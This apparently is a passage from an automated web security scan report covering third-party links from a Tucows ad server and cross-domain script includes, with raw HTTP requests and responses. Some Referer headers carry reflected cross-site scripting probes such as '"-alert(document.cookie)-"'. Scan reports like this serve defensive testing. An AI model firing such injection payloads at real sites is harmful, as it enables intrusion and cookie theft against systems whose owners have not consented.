button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Woz on his many devices and the white iPhone 4 - The Engadget Show" data-thumb="//i2.ytimg.com/vi/1Kr7itaCnGI/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/28');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Volkswagen Commercial: The Force" data-thumb="//i3.ytimg.com/vi/R55e-uHQna0/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/2');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Volkswagen Commercial: The Force" data-thumb="//i3.ytimg.com/vi/R55e-uHQna0/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/0%26s%3Dmp');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Rosie Huntington eats Falafel" data-thumb="//i4.ytimg.com/vi/Wo9cx05PsSc/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/0%26s%3Dmf');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i4.ytimg.com/vi/cmU39pGh5B8/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i4.ytimg.com/vi/gwn8FzrbSyQ/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i2.ytimg.com/vi/5Bj5WckNV3s/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i2.ytimg.com/vi/MWWC4uB2Ry4/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i2.ytimg.com/vi/YwYijHKtVUY/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i3.ytimg.com/vi/R55e-uHQna0/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i2.ytimg.com/vi/9y2gPm9RuYo/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i3.ytimg.com/vi/rYgQnKdrh2A/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i4.ytimg.com/vi/wseVtJcmTfE/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i2.ytimg.com/vi/YNs40-MN_D8/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<h3><a href="http://youtube-global.blogspot.com/2010/10/1-billion-subscriptions-and-counting.html">Subscription Widget</a>
...[SNIP]...
<h3>
<a href="http://youtube-global.blogspot.com/">Enjoy videos about some of the greatest artworks in the world</a>
...[SNIP]...
<p class="alignR">
<a href="http://youtube-global.blogspot.com/">Read more in our Blog</a>
...[SNIP]...
<li><a href="http://code.google.com/apis/youtube/overview.html">Developers</a>
...[SNIP]...
<li><a href="http://www.google.com/support/youtube/bin/static.py?p=homepage&amp;page=start.cs&amp;hl=en_US" onmousedown="yt.analytics.trackEvent('Footer', 'link', 'Help');">Help</a>
...[SNIP]...
<li><a href="http://www.google.com/support/youtube/bin/request.py?contact_type=abuse&amp;hl=en_US" onmousedown="yt.analytics.trackEvent('Footer', 'link', 'Safety');">Safety</a>
...[SNIP]...
</span>

<a href="http://www.google.com/tools/feedback/intl/en/error.html" onclick="return yt.www.feedback.start('en', {&quot;accept_language&quot;: &quot;en&quot;});" id="reportbug">Report a bug</a>
...[SNIP]...
<div id="quicklist-player-close"><img onclick="yt.www.navigation.expandPlayer();" class="master-sprite expand-button" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif"><img onclick="yt.www.navigation.closePlayer();" class="master-sprite close-button" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif"></div>
...[SNIP]...
<div id="quicklist-notifications" style="display: none;" class="yt-alert yt-alert-success yt-alert-small yt-alert-naked yt-rounded">
<img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" class="icon master-sprite" alt="Alert icon">

<div class="yt-alert-content">
...[SNIP]...
pe="button" class="master-sprite yt-uix-tooltip yt-uix-tooltip-masked start start-edge yt-uix-button yt-uix-tooltip" onclick=";return false;" title="Previous video" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-prev" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button><button type="button" class="master-sprite yt-uix-tooltip yt-uix-tooltip-masked end yt-uix-button" onclick=";return false;" id="quicklist-next-button" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-next" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button>
...[SNIP]...
ist-play-button" type="button" class="master-sprite yt-uix-tooltip yt-uix-tooltip-masked yt-uix-button yt-uix-tooltip" onclick=";return false;" title="Play videos" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-play" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button>
...[SNIP]...
</span> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""><div style="display:none;" class="yt-uix-button-menu">
...[SNIP]...
aster-sprite yt-uix-tooltip yt-uix-tooltip-masked start quicklist-active yt-uix-button yt-uix-button-toggle" onclick=";return false;" id="quicklist-autoplay-button" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-autoplay" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button>
...[SNIP]...
master-sprite yt-uix-tooltip yt-uix-tooltip-masked start quicklist-active yt-uix-button yt-uix-button-toggle" onclick=";return false;" id="quicklist-shuffle-button" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-shuffle" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button><button type="button" class="master-sprite yt-uix-tooltip yt-uix-tooltip-masked end end-edge yt-uix-button" onclick=";return false;" id="quicklist-toggle-button" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-toggle" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button>
...[SNIP]...
<button class="yt-uix-button quicklist-tray-button yt-uix-slider-prev" onclick="return false;"><img class="yt-uix-slider-prev-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Previous"></button><button class="yt-uix-button quicklist-tray-button yt-uix-slider-next" onclick="return false;"><img class="yt-uix-slider-next-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Next"></button>
...[SNIP]...
<li class="empty quicklist-help-message">Your queue is empty. Add videos to your queue using this button: <img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" class="addto-button-help"><br> or <a href="https://www.google.com/accounts/ServiceLogin?uilel=3&amp;service=youtube&amp;passive=true&amp;continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F%253Fhl%253Den%2526tab%253Dw1&amp;hl=en_US&amp;ltmpl=sso">sign in</a>
...[SNIP]...
<div id="quicklist-loading"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Loading..."><span id="quicklist-loading-message">
...[SNIP]...
<span class="yt-uix-button-menu-item " onclick="">
<a href="https://www.google.com/accounts/ServiceLogin?uilel=3&amp;service=youtube&amp;passive=true&amp;continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F%253Fhl%253Den%2526tab%253Dw1&amp;hl=en_US&amp;ltmpl=sso">Sign in</a>
...[SNIP]...

18.141. http://www8.tucows.com/delivery/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www8.tucows.com
Path:   /delivery/afr.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /delivery/afr.php?zoneid=1&cb=d04b518f HTTP/1.1
Host: www8.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAVARS[aed03704]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22933%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D; OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; OAID=f41efd0364d75038834b62f043c90f9a

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 02:06:22 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=f41efd0364d75038834b62f043c90f9a; expires=Sat, 04-Feb-2012 02:06:22 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 1049

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
</style><iframe src="http://www.inklineglobal.com/adsales/tucows/300x250_banner1.html" frameborder="0" height="250" width="300" scrolling="no"></iframe>
...[SNIP]...

18.142. http://www8.tucows.com/delivery/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www8.tucows.com
Path:   /delivery/afr.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /delivery/afr.php?zoneid=66&cb=d4982c20 HTTP/1.1
Host: www8.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAVARS[aed03704]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22933%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D; OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; OAID=f41efd0364d75038834b62f043c90f9a

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 02:06:22 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=f41efd0364d75038834b62f043c90f9a; expires=Sat, 04-Feb-2012 02:06:22 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 1050

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
</style><iframe src="http://www.inklineglobal.com/adsales/tucows/300x100_banner1.html" frameborder="0" height="100" width="300" scrolling="no"></iframe>
...[SNIP]...

18.143. http://www8.tucows.com/delivery/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www8.tucows.com
Path:   /delivery/afr.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /delivery/afr.php?zoneid=187&cb=6253c4ae HTTP/1.1
Host: www8.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:35:17 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; path=/
Set-Cookie: OAID=f41efd0364d75038834b62f043c90f9a; expires=Fri, 03-Feb-2012 20:35:17 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 1104

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

18.144. http://www8.tucows.com/delivery/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www8.tucows.com
Path:   /delivery/afr.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /delivery/afr.php?zoneid=64&cb=5fca29ec HTTP/1.1
Host: www8.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmb=163973946; __utmc=163973946; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; OAID=f41efd0364d75038834b62f043c90f9a

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:35:50 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=f41efd0364d75038834b62f043c90f9a; expires=Fri, 03-Feb-2012 20:35:50 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 1220

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
b26431ec0__oadest=http%3A%2F%2Fwww.kqzyfj.com%2Fclick-3184010-10762474"onmouseover="window.status='http://www.kobobooks.com';return true;" onmouseout="window.status=' ';return true;" target="_blank">
<img src="http://www.tqlkg.com/image-3184010-10762474" width="300" height="250" alt="Choose from over 2 million ebooks!" border="0"/></a>
...[SNIP]...

19. Cross-domain script include  previous  next
There are 480 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


19.1. http://abcconstructioninc.com/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://abcconstructioninc.com
Path:   /x22

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /x22 HTTP/1.1
Host: abcconstructioninc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 15323
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
p3p: CP="CAO PSA OUR"
Set-Cookie: SessionID=22146804-4bfb-4cf6-b5b2-7bacae0829d7; path=/
Set-Cookie: VisitorID=60133734-1246-4af2-baac-a1202fcd04b6&Exp=2/3/2014 12:31:23 PM; expires=Mon, 03-Feb-2014 20:31:23 GMT; path=/
Set-Cookie: yahooToken=qs=06oENya4ZG1YS6vOLJwpLiFdjG98_E6OGGJCFiX0NgKsoOxXTlKV4uDkZj86FG0dTFH0nLV2clUI7HjyzVrEXGgiu0vRU5p5INcpx4T8lOhJVhTOm4Ja9LYYjqIqKfGNHYAbvQ37XuTFpoMjb7IzwhzqRnqas1280STELPvNwWooR-0l5LusXktjPWwdMaks8xcGwlV0_lATJtNiA2A63kzUzbpN2qqNDG,YT0zO2s9MTA.; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:31:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Cont
...[SNIP]...
</noscript>
<script type='text/javascript' src='http://search.dmtracker.com/tags/vs.js'></script>
...[SNIP]...

19.2. http://abcnews.go.com/Sports/wireStory  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://abcnews.go.com
Path:   /Sports/wireStory

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Sports/wireStory HTTP/1.1
Host: abcnews.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:31:26 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
